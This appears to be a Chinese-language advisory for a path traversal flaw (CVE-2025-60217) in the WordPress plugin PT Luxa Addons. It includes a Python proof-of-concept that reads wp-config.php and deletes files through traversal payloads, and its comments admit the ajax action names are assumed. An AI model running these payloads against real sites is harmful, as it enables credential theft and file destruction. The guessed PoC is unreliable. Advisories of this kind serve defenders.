CVE-2025-60217 PT Luxa Addons插件路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-60217

漏洞类型

路径遍历

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PT Luxa Addons (pt-luxa-addons)

漏洞概述

CVE-2025-60217是WordPress插件PT Luxa Addons中发现的高危安全漏洞，CVSS评分达到7.7分。该漏洞属于路径遍历（Path Traversal）类别，官方命名为“不当限制路径名到受限目录”。攻击者可以利用此漏洞绕过目录访问限制，遍历服务器文件系统并访问敏感文件。更严重的是，该漏洞允许攻击者执行任意文件删除操作，可能导致网站功能瘫痪、数据丢失甚至服务器完全沦陷。PT Luxa Addons插件是一款用于WordPress网站的增强组件，在版本1.2.2及之前的所有版本均受此漏洞影响。由于该插件可能部署在众多企业官网、电子商务平台及个人博客中，漏洞的广泛影响范围使其成为近期WordPress生态系统中需要紧急处理的安全威胁之一。

技术细节

路径遍历漏洞，又称目录遍历攻击，发生在应用程序未对用户输入的文件路径进行充分验证时。PT Luxa Addons插件在处理文件操作请求时，直接将用户可控的参数拼接到文件路径中，而未进行安全过滤或路径规范化处理。攻击者可以通过构造特殊的路径字符串（如../）来跳出应用程序的预期目录，访问服务器上的任意文件。在利用此漏洞进行任意文件删除时，攻击者通常需要具备低权限用户账户（PR:L），通过发送特制的HTTP请求到存在漏洞的文件操作接口。请求中包含路径遍历序列（如../../../../etc/passwd或../../wp-config.php），应用程序在未进行安全校验的情况下会执行相应的文件删除操作。由于攻击向量为网络远程（AV:N）且无需用户交互（UI:N），具有WordPress订阅者或贡献者级别账户的恶意用户即可实施攻击。

攻击链分析

STEP 1

步骤1

攻击者获取目标WordPress网站的有效低权限账户（订阅者或贡献者级别）

STEP 2

步骤2

攻击者构造包含路径遍历序列的恶意请求，如使用../跳转到系统目录

STEP 3

步骤3

发送特制HTTP请求到插件的文件操作接口（如admin-ajax.php）

STEP 4

步骤4

应用程序未验证路径有效性，直接执行文件读取或删除操作

STEP 5

步骤5

攻击者成功读取敏感配置文件或删除关键文件，导致网站功能受损或数据泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-60217 PT Luxa Addons Path Traversal PoC
# Target: WordPress site with pt-luxa-addons plugin <= 1.2.2
# Authentication required: Low privilege (subscriber/contributor)

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"
USERNAME = sys.argv[2] if len(sys.argv) > 2 else "attacker"
PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "password"

def exploit_path_traversal():
    """Exploit path traversal to read arbitrary files"""
    session = requests.Session()
    
    # Login to WordPress
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "redirect_to": "/wp-admin/",
        "testcookie": "1"
    }
    
    session.post(login_url, data=login_data)
    
    # Path traversal file read exploit
    exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    payload = {
        "action": "pt_luxa_file_read",  # Assumed action name
        "file": "../../../../wp-config.php"  # Path traversal payload
    }
    
    response = session.get(exploit_url, params=payload)
    
    if response.status_code == 200:
        print("[+] File read successful!")
        print("Response:", response.text[:500])
    else:
        print("[-] Exploit failed")

def exploit_file_deletion():
    """Exploit path traversal to delete arbitrary files"""
    session = requests.Session()
    
    # Login first
    login_url = f"{TARGET_URL}/wp-login.php"
    session.post(login_url, data={"log": USERNAME, "pwd": PASSWORD})
    
    # File deletion exploit
    delete_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    delete_payload = {
        "action": "pt_luxa_file_delete",  # Assumed action name
        "file": "../../../../wp-content/uploads/malicious.txt"
    }
    
    response = session.post(delete_url, data=delete_payload)
    
    if response.status_code == 200:
        print("[+] File deletion successful!")
    else:
        print("[-] Deletion failed")

if __name__ == "__main__":
    print("CVE-2025-60217 PT Luxa Addons Path Traversal Exploit")
    print("=" * 50)
    exploit_path_traversal()

影响范围

PT Luxa Addons (pt-luxa-addons) <= 1.2.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：禁用或删除PT Luxa Addons插件；限制WordPress用户的角色权限，确保普通用户无法访问管理功能；通过.htaccess或Nginx配置限制对wp-admin目录的访问；对所有用户输入实施严格的输入验证和过滤；启用服务器的目录浏览限制；定期备份网站数据以便在遭受攻击后快速恢复。建议持续关注插件官方安全公告，获取最新修复版本信息。